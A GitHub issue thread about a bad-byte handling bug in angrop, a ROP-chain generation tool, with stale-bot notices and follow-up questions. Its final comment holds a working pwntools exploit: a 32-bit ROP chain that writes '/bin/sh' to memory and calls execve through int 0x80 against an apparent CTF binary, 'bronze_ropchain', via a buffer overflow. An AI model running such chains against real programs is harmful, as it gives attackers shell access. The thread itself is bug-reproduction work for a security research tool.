Closed redfast00 closed 2 years ago
rop.set_regs(eax=0).payload_str()
also includes the bad bytes. Maybe there is no constraint added for the values on the stack that will be popped?
This issue has been marked as stale
because it has no recent activity. Please comment or add the pinned
tag to prevent this issue from being closed.
is this issue fixed?
This issue has been marked as stale
because it has no recent activity. Please comment or add the pinned
tag to prevent this issue from being closed.
is this issue fixed?
I think I refactored angrop's badbyte handling mechanism once and it should be fixed. Do you think you can still find the binary and share it here so that we can make sure it is actually fixed? @redfast00
^ that happened in early 2021 iirc
I have used angrop to generate a working ropchain using your script. The exploitation script is this:
from pwn import *
chain = b""
chain += p32(0x806ef4c) # adc eax, 0x10; pop edx; pop ecx; pop ebx; ret
chain += p32(0x6e69622f)
chain += p32(0x80d9f51)
chain += p32(0xf5f5f5f5)
chain += p32(0x80501d0) # mov dword ptr [ecx + 0xb0], edx; ret
chain += p32(0x806ef4c) # adc eax, 0x10; pop edx; pop ecx; pop ebx; ret
chain += p32(0xff68732f)
chain += p32(0x80d9f55)
chain += p32(0xf5f5f5f5)
chain += p32(0x80501d0) # mov dword ptr [ecx + 0xb0], edx; ret
chain += p32(0x806274c) # lea esi, [esi]; xor eax, eax; ret
chain += p32(0x80ce6b5) # pop edx; ret
chain += p32(0x80da008)
chain += p32(0x8066d62) # mov byte ptr [edx], al; mov eax, edx; ret
chain += p32(0x8092016) # mov eax, 8; pop edi; ret
chain += p32(0xf5f5f5f5)
chain += p32(0x8092d7b) # mov edi, 0; add eax, 3; ret
chain += p32(0x80ce6b5) # pop edx; ret
chain += p32(0x8048008)
chain += p32(0x806ef52) # pop ecx; pop ebx; ret
chain += p32(0x8048008)
chain += p32(0x80da001)
chain += p32(0x806f860) # int 0x80
#r = gdb.debug("./bronze_ropchain")
r = process("./bronze_ropchain")
r.sendlineafter(b"name?", b'A'*28+chain)
r.interactive(
the patch is pending.